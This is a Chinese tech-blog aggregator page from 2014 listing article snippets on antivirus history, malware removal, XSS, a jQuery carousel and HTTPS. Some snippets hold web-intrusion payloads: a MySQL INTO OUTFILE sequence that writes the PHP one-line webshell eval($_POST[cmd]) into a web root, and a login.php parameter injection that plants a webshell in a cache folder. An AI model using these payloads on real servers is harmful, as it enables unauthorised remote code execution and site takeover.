用户至上在互联网真不是一句口号,只有真正这么做了,才能生存。
360开始没有任何高深的技术背景,从查杀流氓软件起步(本身就是做流氓软件起家的,做这个自然最在行),这件看似无利可图的事情为契机,迅速获得上亿用户,然后花钱请人,买技术,做杀木马,进而做拦截木马,和打安全补丁。进而做360安全浏览器。最后买进国际最先进杀毒技术,做免费杀毒。360就是这样一步一个脚印走出来的。据说现在又准备在手机杀毒领域有所作为了:)我的大学上铺作为国际上手机安全领域的先行者之一,曾经技术上支持过360,所以给点小道消息:)...
分类:
其他好文 时间:
2014-12-26 01:03:15
阅读次数:
178
MySQL:DropTABLEIFEXISTStemp;//如果存在temp就删掉CreateTABLEtemp(cmdtextNOTNULL);//建立temp表,里面就一个cmd字段InsertINTOtemp(cmd)VALUES(<?phpeval($_POST[cmd]);?>);//把一句话木马插入到temp表SelectcmdfromtempintooutfileF:/wwwroot/eval.php;//查询temp表..
分类:
数据库 时间:
2014-12-24 06:30:25
阅读次数:
237
一、前言
之前在《病毒木马查杀第002篇:熊猫烧香之手动查杀》中,我在不借助任何工具的情况下,基本实现了对于“熊猫烧香”病毒的查杀。但是毕竟“熊猫烧香”是一款比较简单的病毒,它并没有采取一些特别强的自我保护技术,所以我们完全可以“徒手”解决。但是这次研究的恶意程序就没那么简单,它采取了进程保护的技术,使得我们不能够使用常规手法对其实现查杀。所以这次我引入了两个工具——iceswo...
分类:
其他好文 时间:
2014-12-23 19:39:34
阅读次数:
207
Elastislide 是一款非常优秀的响应式 jQuery 图片循环展示(旋转木马)插件,集成了 Touchwipe 插件以支持触屏设备。提供了四种效果:水平图片传送带、垂直图片传送带、固定在屏幕底部以及缩略图形式预览。
分类:
其他好文 时间:
2014-12-22 17:51:42
阅读次数:
167
强悍的PHP一句话后门这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。1.利用404页面隐藏PHP小马: 1 2 3 404 Not Found 4 5 Not Found ...
分类:
Web程序 时间:
2014-12-20 16:51:04
阅读次数:
301
在其域名后加上这样一段代码:login.php?makehtml=1&chdb[htmlname]=xx.php& chdb[path]=cache&content=。这段代码 的意思利用login.php文件将这段代码写入到网站缓存目录 cache的xx.php文件中。“”就是一句话木马的服务端。...
分类:
Web程序 时间:
2014-12-18 06:50:08
阅读次数:
176
上次说到我们的服务器因为这个客服系统被拿下后,我们在服务器后台进行了木马查杀,结果杀出了不少木马,但经过筛选之后,真正能执行的只有2个,查看这两个木马的创建时间,一个是3天前,也就是白帽子第一次尝试跟我们联系的时间点,而另外一个创建时间居然是几年前,在百思不得其解的情况下我们向这位白帽子进行了确认,...
分类:
Web程序 时间:
2014-12-16 20:44:08
阅读次数:
226
记得之前看过一篇文章,这样来形容XSS “ 如果把浏览器看作WEB2.0后时代的操作系统,那么客户端脚本就相当于传统的应用程序,而XSS的攻击方式其实就相当于在被攻击者的系统上执行了一个木马程序。但这种“木马”有个很大的缺点,就是无法像传统木马那样在操作系统中安家,以后还能自动执行。 ”
这可能是对XSS的最好诠释了吧,但是XSS究竟是什么?下面就跟小菜来一窥其神秘面容吧。
XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户...
分类:
其他好文 时间:
2014-12-16 15:08:19
阅读次数:
162
工具下载地址:http://pan.baidu.com/s/1o6jxAgq这里的asp后门不指像那些一句话木马、砍客、冰狐、明小子之类的b/s型的,只指像cmd.asp或2005a.asp的。
第一个,来看zzzeva免fso的cmd.asp
代码如下:<formmethod="post">
<inputtype=textname="cmd"size=60>..
分类:
Web程序 时间:
2014-12-15 06:37:08
阅读次数:
1439
BlogDate: 2010-01-17最近,Google针对Gmail被攻击事件,全面默认启用了始终以https访问Gmail的方式了。但是,对于可以动用整个国家力量的黑客来说,从网络通讯数据中(在此不讨论对用户电脑种木马破解https的情况,只讨论在网络通讯数据中破解https的方法)破解htt...
分类:
Web程序 时间:
2014-12-14 11:55:08
阅读次数:
162
